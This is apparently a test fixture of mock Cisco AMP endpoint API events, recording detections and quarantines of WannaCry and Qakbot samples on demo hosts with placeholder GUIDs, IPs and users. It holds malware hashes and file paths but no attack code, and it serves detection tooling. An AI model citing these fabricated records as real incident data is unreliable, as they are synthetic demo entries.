pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine 